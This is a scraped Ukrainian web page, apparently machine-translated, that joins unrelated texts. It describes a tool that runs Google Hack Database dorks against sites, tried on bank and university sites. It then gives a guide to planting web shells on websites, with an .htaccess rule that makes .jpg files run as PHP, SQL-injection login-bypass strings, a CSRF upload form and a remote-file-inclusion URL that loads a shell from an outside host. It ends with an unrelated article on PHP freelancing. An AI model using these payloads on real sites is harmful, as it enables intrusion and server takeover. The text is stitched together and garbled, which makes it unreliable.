Синтаксис dorks <br></p><table border="1"><tbody><tr><td width="214"><b>Команда</b><br></td> <td width="214"><b>Опція</b><br></td> <td width="214"><b>Опис</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-l <br></td> <td width="214">Вивести нумерований список категорій дорків Google Hack Database <br></td> </tr><tr><td width="214">-c «номер або назва категорії» <br></td> <td width="214">Завантажити доріжки вказаної категорії за номером чи назвою <br></td> </tr><tr><td width="214">-q «фраза» <br></td> <td width="214">Завантажити дорки, знайдені за запитом <br></td> </tr><tr><td width="214">-o "файл" <br></td> <td width="214">Зберегти результат у файл (тільки разом із опціями -c|-q) <br></td> </tr><tr><td rowspan="8" width="214">google <br></td> <td width="214">-d «дорк» <br></td> <td width="214">Вказати довільний дорк (опція може використовуватися багато разів, допускається поєднання з опцією -D) <br></td> </tr><tr><td width="214">-D "файл" <br></td> <td width="214">Використовувати доріжки з файлу <br></td> </tr><tr><td width="214">-s «сайт» <br></td> <td width="214">Вказати сайт (опція може використовуватися багато разів, допускається поєднання з опцією -S) <br></td> </tr><tr><td width="214">-S "файл" <br></td> <td width="214">Використовувати сайти з файлу (перебір доріжок буде виконаний по кожному сайту незалежно) <br></td> </tr><tr><td width="214">-f "фільтр" <br></td> <td width="214">Задати додаткові ключові слова (буде додано до кожного дорка) <br></td> </tr><tr><td width="214">-t «кількість мс» <br></td> <td width="214">Інтервал між запитами до Google <br></td> </tr><tr><td width="214">-T «кількість мс» <br></td> <td width="214">Таймаут, якщо зустрілася каптча <br></td> </tr><tr><td width="214">-o "файл" <br></td> <td width="214">Зберегти результат у файл (будуть збережені лише ті доркі, за якими щось знайшлося) <br></td> </tr></tbody></table><br>За допомогою команди ghdb можна отримати всі доркі з exploit-db за довільним запитом, або вказати всю категорію. Якщо вказати категорію 0 - то буде вивантажено всю базу (близько 4.5 тисяч дорків). <p>Список категорій доступних на даний момент представлений малюнку 2. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>Малюнок 2 - Список доступних категорій дорків GHDB</p><p>Командою google буде проведена підстановка кожного доріка в пошуковик google і проаналізовано результат щодо збігів. Дорки за якими щось знайшлося будуть збережені у файл. <br>Утиліта підтримує різні режими пошуку: <br>1 дорк та 1 сайт; <br>1 дорк та багато сайтів; <br>1 сайт та багато дорків; <br>багато сайтів та багато дорків; <br>Список доріжок та сайтів можна задати як через аргумент, так і через файл.</p><p><b>Демонстрація роботи</b><br>Спробуємо пошукати будь-які вразливості на прикладі пошуку повідомлень про помилки. За командою: dorks ghdb –c 7 –o errors.dorks будуть завантажені всі відомі доркі категорії “Error Messages” як показано на малюнку 3. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 3 – Завантаження всіх відомих дорків категорії “Error Messages”</p><p>Дорки завантажені та збережені у файл. Тепер залишається «натруїти» їх на якийсь сайт (див. рисунок 4). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 4 – Пошук вразливостей сайту, що цікавиться, в кеші google</p><p>Через деякий час на досліджуваному сайті виявляється кілька сторінок, які містять помилки (див. рис. 5).</p><p><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 5 – Знайдені повідомлення про помилки</p><p>Підсумок у файлі result.txt отримуємо повний список доріжок, що призводять до появи помилки. <br>На малюнку 6 наведено результат пошуку помилок сайту. <br><br>Малюнок 6 – Результат пошуку помилок</p><p>У кеші по даному доріку виводиться повний бектрейс, що розкривають абсолютні шляхи скриптів, систему керування вмістом сайту та тип бази даних (див. рис. 7). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 7 – розкриття інформації про влаштування сайту</p><p>Однак варто враховувати, що не всі доріжки з GHDB дають справжній результат. Також google може знайти точного збіги і показати схожий результат.</p><p>У такому разі розумніше використовувати свій персональний список дорків. Наприклад, завжди варто пошукати файли з «незвичайними» розширеннями, приклади яких наведено малюнку 8. <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 8 – Список розширень файлів, не характерних для звичайного веб-ресурсу</p><p>У результаті, за командою dorks google –D extensions.txt –f банк, з першого запиту google починає віддавати сайти з «незвичайними» розширеннями файлів (див. малюнок 9). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 9 – Пошук «нехороших» типів файлів на сайтах банківської тематики</p><p>Варто мати на увазі, що google не сприймає запити довші за 32 слова.</p><p>За допомогою команди dorks google –d intext:”error|warning|notice|syntax” –f університет <br>можна знайти помилки інтерпретатора PHP на сайтах навчальної тематики (див. малюнок 10). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 10 – Пошук PHP-помилок часу виконання</p><p>Іноді користуватися якоюсь однією чи двома категоріями дорків не зручно. <br>Наприклад, якщо відомо, що сайт працює на движку wordpress, то потрібні доріжки саме по wordpress. У такому випадку зручно користуватися пошуком Google Hack Database. Команда dorks ghdb –q wordpress –o wordpress_dorks.txt завантажить всі доркі по Wordpress, як показано на малюнку 11: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 11 – Пошук доріжок, що стосуються Wordpress</p><p>Знову повернемося до банків та командою dorks google –D wordpress_dords.txt –f банк спробуємо знайти щось цікаве, пов'язане з wordpress (див. малюнок 12). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 12 – Пошук вразливостей Wordpress</p><p>Варто зауважити, що пошук на Google Hack Database не сприймає слова коротше 4 символів. Наприклад, якщо CMS сайту не відома, але відома мова – PHP. У такому разі можна відфільтрувати потрібне вручну за допомогою пайпа та системної утиліти пошуку dorks – c all | findstr /I php > php_dorks.txt (див. малюнок 13): <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>Малюнок 13 – Пошук по всіх доріг, де є згадка PHP</p><p>Пошук вразливостей або якоїсь чутливої ​​інформації в пошуковій системі слід шукати тільки у випадку, якщо на цьому сайті є значний індекс. Наприклад, якщо у сайту проіндексовано 10-15 сторінок, то безглуздо щось шукати подібним чином. Перевірити розмір індексу просто – достатньо ввести в рядок пошуку google «site:somesite.com». Приклад сайту з недостатнім індексом показано на малюнку 14. <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>Рисунок 14 – Перевірка розміру індексу сайту</p><p>Тепер про неприємне ... Періодично google може запросити каптчу - тут нічого не вдієш - її доведеться ввести. Наприклад, у мене, при переборі категорії «Error Messages» (90 дорків) каптча випала лише один раз.</p><p>Варто додати, що phantomjs підтримує роботу так само через проксі, як через http, так і через socks інтерфейс. Для включення режиму проксі треба розкоментувати відповідний рядок dorks.bat або dorks.sh.</p><p>Інструмент доступний у вигляді вихідного коду</p> <br>У цій статті я хочу розповісти про найчастіше використовувані способи заливання шеллу на сайт. <b>Web-shell</b>- це шкідливий скрипт (програма), який зловмисники використовують для управління сайтами або серверами. <p><b>Спосіб 1</b><br>Знайти на сайті форму для завантаження файлів/картинок. Допустимо нам не вдалося зламати адмінку сайту і ми намагаємося залити наш шелл з <b>розширенням.php.jpg.</b>Якщо вдалося, то побачимо замість картинки біле вікно, ми клацаємо правою кнопкою миші і переходимо за посиланням. У разі провалу ми можемо скористатися розширенням chrome <b>tamper data</b>. Воно дозволяє перехопити та змінити запит як ви хочете. Якщо сайт перевіряє, чи розширення файлу, то спочатку ми можемо залити <b>.htaccess</b>файл із вмістом: <br>AddType application/x-httpd-php .jpg <br>Ця команда буде виконувати jpg файли як php. <br><b>Детальна відеоінструкція:</b><br></p><p><span class="imp1oe54JeQ"></span></p><p>Відеоінструкція з <b>встановлення tamper data:</b><br></p><p><span class="JA5K4KJ0NCc"></span></p><br><b>Спосіб 2</b><br>Скористайтеся програмою для пошуку адмінок на сайті - https://github.com/bdblackhat/admin-panel-finder . Коли програма знайшла адмінку, ми можемо спробувати провести sql-injection. У полі логіна та пароля сайту ми вбиваємо код: <br><p>" or "1"="1 " OR 1=1/*</p><p>Якщо спрацьовує, то ми потрапляємо до адмінки і <b>діємо по 1 способу.</b>Якщо ж на сайті в панелі адміністратора немає sql-injection, тоді ми можемо спробувати збрудити або знайти експлоїт під дану CMS. <br><b>Детальна відеоінструкція:</b><br></p><p><span class="5Kh5gCr_3rc"></span></p><br><b>Спосіб 3</b><br>У 3 способі ми шукатимемо sql-injection на самому сайті. Ми можемо робити це вручну або скористаємося sqlmap . На форумі достатньо тим, як можна проводити ін'єкції, тому зайду здалеку. Отже, ось ми вже знайшли таблицю з логіном і паролем адміну, розшифровуємо хеші, заходимо в адмінку і радіємо. Але припустимо ми не змогли розшифрувати пароль і все накрилося мідним тазом, тоді ми повинні перевірити привілеї нашого користувача <b>. </b>Перевіряємо привілеї та завантажуємо міні-шелл. <b>З якихось причин, коли я хочу вставити код сайт видає ошбіку.</b><p><b>Спосіб 4</b><br>4 спосіб має на увазі csrf атаку. У наведеному нижче коді нам потрібно замінити <b>http://</b>на заслання нашої мети. <b>Вибрати шелл</b>та натиснути кнопку <b>upload.</b><br></p><p> <form method="POST" action="http://" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="Upload"> </form></p><p><span class="FXOjzV5I1Cc"></span></p><br><b>Спосіб 5</b><br>Дізнатися як більше про вашу мету і знайти експлоїт. Для цього є дуже цікавий сайт - https://www.exploit-db.com. Ніхто й не скасовував масового зламування сайтів через уразливості, але про це вже є стаття на формі. <p>Існує ще безліч способів заливання шелла і розповідати про кожного немає сенсу. Якщо ви хочете потренуватися, то встановіть dvwa – це програма, створена для того, щоб допомогти професіоналам з безпеки протестувати їхні навички та інструменти в легальному оточенні.</p><p><b>Спосіб 6 <br><b>Php-injection</b>- це форма атаки на сайт, коли атакуючий впроваджує свій php-код в php-додаток, що атакується.</b><br>www.site.ru?page=home.html <br>Виконавши команду, ми підвантажимо сторінку home.html. Тепер ми спробуємо підвантажити шкідливий шелл. <br>www.site.ru?page=http:/hacker.ru/webshell.php <br>Дорк: <b>Inurl:page=</b></p><p>Також є спосіб знайти вже залитий шелл за допомогою perl</p> <p> » </p><h1>Як php програмісту добре заробляти вдома?</h1><p>Більшість успішних php програмістів добре заробляють удома. На початку будь-якого заробітку виникають складнощі. Буває, що складнощі і не знання методів заробітку відбивають все бажання заробляти вдома і тоді програмісти шукають можливість роботи в офісах, де є велика гарантія, що гроші можна отримувати щомісяця, і можливе професійне зростання.</p><p>Але можливість працювати вдома має більше плюсів, ніж мінусів.</p><h3>Плюси</h3><p>Ви працюватимете на себе. Вас ніхто не звільнить, ви зможете самі розподілити свій графік або працювати в той час, коли самі захочете.</p><p>Ви самі для себе вибираєте для себе спосіб заробітку за допомогою програмування що по перше збільшить ваш інтерес до роботи, по-друге ви маєте велику свободу дії. Вам не потрібно працювати над тим, що вам не подобається. Також більше можливостей поєднувати методи заробітку.</p><h3>Мінуси</h3><p>Спочатку буде складно, і щоб отримати перші гроші за свою працю, потрібно чимало вкласти зусиль і часу. І щоб прибуток був завжди необхідно постійно розвиватися і мати терпіння і самому правильно розподіляти свій графік, щоб вам вистачило часу виконати роботу вчасно.</p><h3>Заробіток на своїх скриптах</h3><p>В інтернеті багато різних скриптів, які люди можуть легко завантажити та встановити на своєму сайті. Ви можете написати свій унікальний скрипт, і є два варіанти, як можна заробити на своєму скрипті. Продати його або розмістити через файлообмінники. Ви можете також користуватися двома варіантами. Наприклад, легкі скрипти, але при цьому дуже важливо розміщувати через файлообмінники саме ті скрипти, на яких будуть великий попит. Для цього скрипти мають бути затребувані, щоб люди завантажували для своїх потреб.</p><p>Великі скрипти можна продавати за розумні ціни. Ви можете розміщувати оголошення на форумах, або якщо у вас є власний блог або сайт розміщуйте рекламу про продаж скриптів.</p><p>У будь-якому випадку, який би варіант ви не вибрали, розміщуйте скрипт в архіві та обов'язково помістіть докладну інструкцію та контактну інформацію про себе. Обов'язково підтримайте, адже це важливо для вашої роботи на себе. Адже вам потрібно щоб вас рекомендували або ваші скрипти завантажували. Вони мають бути якісними. Якщо до вас звернулася людина за допомогою, ввічливо їй поясніть про скрипт або допоможіть встановити. У ваших скриптах мають бути коментарі. За що відповідає кожна функція тощо. Адже людина може легко заплутатися у вашому коді, де не буде позначень.</p><h3>Свої та спільні проекти</h3><p>Добре для успішного заробітку створити свій сайт. Є багато можливостей заробити за допомогою сайту. Якщо ви добре розкрутите його, можна розміщувати туди скрипти на продаж. Спільні проекти розширять ваші можливості, а це добре для успіху програмування вдома. Тому шукайте партнерів чи не відмовляйтеся від пропозицій створити проект спільно.</p><p>На свій сайт ви повинні додавати можливості, які привертають увагу. Сайт може мати звичайний простий вигляд, але при цьому зі своєю родзинкою. Особистий сайт сприяє збільшенню клієнтів. Вони побачать, як працюють ваші скрипти, якщо вони не дуже довго вантажаться, цікаві у використанні, і найголовніше оригінальні, не схожі нема на що. То ви матимете успіх.</p><h3>Заробіток на замовлення</h3><p>Для цього достатньо зареєструватися в різних біржах для фрілансерів і шукати замовлення. Виставляти своє портфоліо зроблених робіт. Але будьте обережні, у світі є не чесні люди і щоб ви не потрапили на обман, спочатку покажіть роботу, яка розташована на вашому сервері (до речі, у цьому випадку Вам знадобиться оренда vps http://nkvd.pro/vps/), а потім вже якщо вам заплатять частину, то половину перенесіть на їхній сервер, так і з другою частиною. Цей метод заробітку вважається прибутковим, але залежить від ступеня ваших знань та умінь. Також залежить від відгуків ваших замовників. Для успіху в цьому способі заробітку виконуйте роботу чесно та якісно. Ви повинні вміти спілкуватися із замовниками, чітко пояснювати, що ви вмієте, а що ні.</p><p>Це далеко не весь список заробітку php-програміста, але завдяки цим способом заробітку, які написані вище, ви вже зможете заробляти, не виходячи з дому. На початковому етапі це буде величезним досягненням. Головне не зупиняйтесь на досягнутому. Постійно вдосконалюйтеся та створюйте проекти, які будуть приносити вам не лише добрий дохід, а й задоволення.</p> <br><b>про автора</b> <br><p>Як php програмісту добре заробляти вдома?</p> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="related_block"> <div class="title">Подібні публікації</div> <ul class="recent_ul"> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/64b7401db355528459e6d4f88f75db81.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/uk/chto-novogo-poluchil-stabilizator-zhiyun-crane-plus-tr-hosevoi.html">Триосьовий електронний стабілізатор Zhiyun Crane Plus (2018) Функція зйомки таймлапсів у русі</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/84de9f3731f3979985fb57b66b81bd5d.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/uk/kak-vklyuchit-vse-yadra-kak-vklyuchit-vse-yadra-processora-kak-vklyuchit.html">Як увімкнути всі ядра процесора Як увімкнути всі процесори на віндовс 10</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/79844ffc013d287bb7adc7f3dabe3e13.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/uk/jbl-go-ne-rabotaet-obzor-besprovodnoi-kolonki-jbl-go-plyusy-i-minusy-jbl.html">Огляд бездротової колонки JBL Go</a></li> </ul> </div> </div> <aside id="sidebar"> <div class="block"> <nav class="sidebar_menu"> <div class="menu-sidebar_menu-container"> <ul id="menu-sidebar_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/programs/">Програми</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/devices/">Пристрої</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/browsers/">Браузери</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/reviews/">Огляди</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/reviews/">Огляди</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/setup/">Налаштування</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/torrent/">Торрент</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/editors/">Редактори</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/instagram/">Інстаграм</a></li> </ul> </div> </nav> </div> <div class="block recent_block"> <div class="title">Останні записи</div> <ul class="popular"> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/95236f72f3e17d8b09868145a5ad3403.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="FlashFire новий додаток для оновлення Android без втрати рута" / loading=lazy loading=lazy> <span class="cat">Програми</span></div> <a href="https://storerarity.ru/uk/root-sletaet-flashfire-novoe-prilozhenie-dlya-obnovleniya-android-bez-utraty-ruta-poteryayu.html">FlashFire новий додаток для оновлення Android без втрати рута</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/e2b88b416324d601a10ad22e6eb523e9.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Керування телефоном з комп'ютера" / loading=lazy loading=lazy> <span class="cat">Програми</span></div> <a href="https://storerarity.ru/uk/peredacha-ekrana-mobilnika-na-kompyuter-upravlenie-telefonom-s-kompyutera.html">Керування телефоном з комп'ютера</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/08ff898ce3f043c159e55cbc5f956187.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Як настроїти бездротовий дисплей Xiaomi" / loading=lazy loading=lazy> <span class="cat">Програми</span></div> <a href="https://storerarity.ru/uk/besprovodnoi-displei-xiaomi-kak-nastroit-noutbuk-kak-nastroit.html">Як настроїти бездротовий дисплей Xiaomi</a></li> </ul> </div> </aside> </div> </div> <div class="clear"></div> <footer id="footer"><div class="wrapper"> <div class="copy">2024 | Комп'ютери для всіх - Налаштування, встановлення, відновлення</div> <nav class="header_menu"> <div class="menu-footer_menu-container"> </div> </nav> </div></footer> <div id="toTop"></div> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script> <nav class="mobile_menu"> <div class="close_menu"></div> <div class="mob_menu"> <div class="menu-mobile_menu-container"> <ul id="menu-mobile_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/programs/">Програми</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/devices/">Пристрої</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/browsers/">Браузери</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/reviews/">Огляди</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/reviews/">Огляди</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/setup/">Налаштування</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/uk/category/torrent/">Торрент</a></li> </ul> </div> </div> </nav> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> </body> </html>